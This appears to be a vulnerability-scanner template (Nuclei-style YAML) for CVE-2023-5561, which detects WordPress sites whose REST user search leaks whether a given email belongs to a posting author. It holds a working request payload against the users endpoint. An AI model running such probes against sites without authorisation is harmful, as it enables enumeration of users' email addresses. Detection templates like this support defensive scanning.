43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
|
id: CVE-2023-5561
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: Unauthenticated Post Author Email Disclosure
|
||
|
|
author: nqdung2002
|
||
|
|
severity: medium
|
||
|
|
description: WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.
|
||
|
|
impact: This can allow unauthenticated attackers to brute force or verify the email addresses of users with published posts or pages on the site.
|
||
|
|
reference:
|
||
|
|
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-470-631-sensitive-information-exposure-via-user-search-rest-endpoint?asset_slug=wordpress
|
||
|
|
- https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441/
|
||
|
|
classification:
|
||
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||
|
|
cvss-score: 5.3
|
||
|
|
cwe-id: CWE-200
|
||
|
|
metadata:
|
||
|
|
max-request: 1
|
||
|
|
framework: wordpress
|
||
|
|
verified: true
|
||
|
|
tags: cve,cve2023,wpscan,disclosure,wp,wordpress,authenticated,email,exposure
|
||
|
|
|
||
|
|
http:
|
||
|
|
- method: GET
|
||
|
|
path:
|
||
|
|
- "{{BaseURL}}/{{route}}search=@"
|
||
|
|
stop-at-first-match: true
|
||
|
|
payloads:
|
||
|
|
route:
|
||
|
|
- "wp-json/wp/v2/users?"
|
||
|
|
- "?rest_route=/wp/v2/users&"
|
||
|
|
attack: clusterbomb
|
||
|
|
|
||
|
|
matchers:
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- 'status_code == 200'
|
||
|
|
- 'contains(body, "{")'
|
||
|
|
condition: and
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
|